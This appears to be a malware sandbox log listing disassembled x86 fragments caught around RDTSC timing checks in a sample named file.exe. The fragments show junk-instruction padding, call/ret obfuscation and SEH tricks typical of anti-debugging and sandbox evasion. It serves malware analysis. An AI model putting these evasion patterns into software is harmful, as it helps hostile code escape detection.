Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8F1C3 second address: D8F26E instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE4DC41ACh 0x00000008 ja 00007F8CE4DC41A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 sub di, D999h 0x00000016 xor edi, dword ptr [ebp+122D2CC0h] 0x0000001c push dword ptr fs:[00000000h] 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F8CE4DC41A8h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d jmp 00007F8CE4DC41ACh 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 call 00007F8CE4DC41AEh 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D122Dh] 0x00000055 push 00000000h 0x00000057 push ecx 0x00000058 call 00007F8CE4DC41A8h 0x0000005d pop ecx 0x0000005e mov dword ptr [esp+04h], ecx 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc ecx 0x0000006b push ecx 0x0000006c ret 0x0000006d pop ecx 0x0000006e ret 0x0000006f sbb bx, 5B92h 0x00000074 push FFFFFFFFh 0x00000076 add ebx, 468DD5C3h 0x0000007c push eax 0x0000007d push eax 0x0000007e push edx 0x0000007f pushad 0x00000080 jno 00007F8CE4DC41A6h 0x00000086 pushad 0x00000087 popad 0x00000088 popad 0x00000089 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D934A5 second address: D934C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F8CE470D04Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D934C5 second address: D9351C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CE4DC41B6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jo 00007F8CE4DC41B9h 0x00000012 jl 00007F8CE4DC41B3h 0x00000018 jmp 00007F8CE4DC41ADh 0x0000001d push 00000000h 0x0000001f or ebx, dword ptr [ebp+122D30C1h] 0x00000025 push 00000000h 0x00000027 mov bx, dx 0x0000002a xchg eax, esi 0x0000002b jmp 00007F8CE4DC41ACh 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D91247 second address: D912D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D2FA9h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007F8CE470D048h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 add ebx, dword ptr [ebp+122D2F71h] 0x0000003d mov eax, dword ptr [ebp+122D0A3Dh] 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007F8CE470D048h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 00000014h 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d call 00007F8CE470D04Bh 0x00000062 cmc 0x00000063 pop edi 0x00000064 push FFFFFFFFh 0x00000066 add dword ptr [ebp+1246AB93h], eax 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F8CE470D050h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D912D9 second address: D912E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D912E3 second address: D912E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9461E second address: D94624 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94624 second address: D94628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D93689 second address: D9368F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9368F second address: D93699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8CE470D046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94850 second address: D94855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D94855 second address: D9485B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D963AD second address: D963C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41B0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D963C2 second address: D963C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D957A2 second address: D957B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41AEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D957B9 second address: D957BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9AE71 second address: D9AE78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA0931 second address: DA0982 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE470D046h 0x00000008 jmp 00007F8CE470D053h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F8CE470D05Ch 0x00000016 jmp 00007F8CE470D054h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA0191 second address: DA01AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 push edi 0x00000008 ja 00007F8CE4DC41A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA508C second address: DA5090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA5090 second address: DA50B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA50B2 second address: DA50B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA50B6 second address: DA50D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA085 second address: DAA089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA4C1 second address: DAA4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA5F7 second address: DAA5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA5FB second address: DAA624 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8CE4DC41ADh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA624 second address: DAA636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA636 second address: DAA63A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA63A second address: DAA672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F8CE470D056h 0x00000011 pushad 0x00000012 popad 0x00000013 jc 00007F8CE470D046h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA819 second address: DAA824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAA824 second address: DAA82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8CE470D046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF3DE second address: DAF3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jo 00007F8CE4DC41B2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF3EC second address: DAF3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAF3F2 second address: DAF413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8CE4DC41ABh 0x0000000b jmp 00007F8CE4DC41B0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAFDA0 second address: DAFDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAFDA6 second address: DAFDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB364F second address: DB3653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78096 second address: D5EFFE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8CE4DC41A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F8CE4DC41B2h 0x00000011 js 00007F8CE4DC41ACh 0x00000017 jns 00007F8CE4DC41A6h 0x0000001d nop 0x0000001e jmp 00007F8CE4DC41AFh 0x00000023 lea eax, dword ptr [ebp+12479E18h] 0x00000029 mov ch, bh 0x0000002b mov edx, dword ptr [ebp+122D2D64h] 0x00000031 nop 0x00000032 jmp 00007F8CE4DC41B8h 0x00000037 push eax 0x00000038 je 00007F8CE4DC41C6h 0x0000003e pushad 0x0000003f jo 00007F8CE4DC41A6h 0x00000045 jmp 00007F8CE4DC41B8h 0x0000004a popad 0x0000004b nop 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007F8CE4DC41A8h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 00000016h 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 movsx edx, dx 0x00000069 call dword ptr [ebp+122D3369h] 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F8CE4DC41AEh 0x00000076 jmp 00007F8CE4DC41AEh 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78594 second address: D78598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78758 second address: D7875E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7875E second address: D78762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78762 second address: D787A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 7BD17684h 0x0000000f jmp 00007F8CE4DC41B3h 0x00000014 call 00007F8CE4DC41A9h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8CE4DC41B0h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D787A0 second address: D7880F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8CE470D056h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F8CE470D055h 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jc 00007F8CE470D052h 0x00000023 mov eax, dword ptr [eax] 0x00000025 js 00007F8CE470D04Eh 0x0000002b push eax 0x0000002c jc 00007F8CE470D046h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7880F second address: D78813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78813 second address: D7882E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7882E second address: D78838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78AFE second address: D78B04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78FD2 second address: D7902B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F8CE4DC41A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 0000001Eh 0x00000026 push 00000000h 0x00000028 push edx 0x00000029 call 00007F8CE4DC41A8h 0x0000002e pop edx 0x0000002f mov dword ptr [esp+04h], edx 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc edx 0x0000003c push edx 0x0000003d ret 0x0000003e pop edx 0x0000003f ret 0x00000040 mov cl, 3Ch 0x00000042 nop 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 push ebx 0x00000047 pop ebx 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7931E second address: D79322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79322 second address: D79328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79444 second address: D79448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79448 second address: D7944E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7944E second address: D79469 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8CE470D04Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D79469 second address: D7946F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB394B second address: DB397B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D053h 0x00000009 jmp 00007F8CE470D04Ah 0x0000000e popad 0x0000000f push esi 0x00000010 jnc 00007F8CE470D046h 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB397B second address: DB397F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3AD5 second address: DB3ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3ADB second address: DB3ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3ADF second address: DB3B02 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F8CE470D04Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F8CE470D046h 0x00000017 jl 00007F8CE470D046h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3B02 second address: DB3B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3B06 second address: DB3B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3B0C second address: DB3B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41ADh 0x00000007 je 00007F8CE4DC41ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB3FB6 second address: DB3FE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE470D056h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB412D second address: DB4131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB4131 second address: DB4153 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F8CE470D054h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB42B3 second address: DB42B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD707 second address: DBD70D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC74D second address: DBC751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC751 second address: DBC75B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC75B second address: DBC76F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE4DC41AEh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBC76F second address: DBC784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCE4C second address: DBCE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCE52 second address: DBCE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F8CE470D059h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCE70 second address: DBCE8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F8CE4DC41B7h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCE8E second address: DBCE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F8CE470D046h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBCFF5 second address: DBCFFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD151 second address: DBD156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD156 second address: DBD17F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CE4DC41ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CE4DC41B7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD17F second address: DBD184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DBD3F8 second address: DBD402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC4320 second address: DC4326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3FB1 second address: DC3FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F8CE4DC41A6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F8CE4DC41B3h 0x00000013 jmp 00007F8CE4DC41B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC3FEC second address: DC3FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC67BB second address: DC67C1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7E78 second address: DC7E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DC7E81 second address: DC7E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCE2BA second address: DCE2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DCD0E5 second address: DCD0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78E0C second address: D78E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
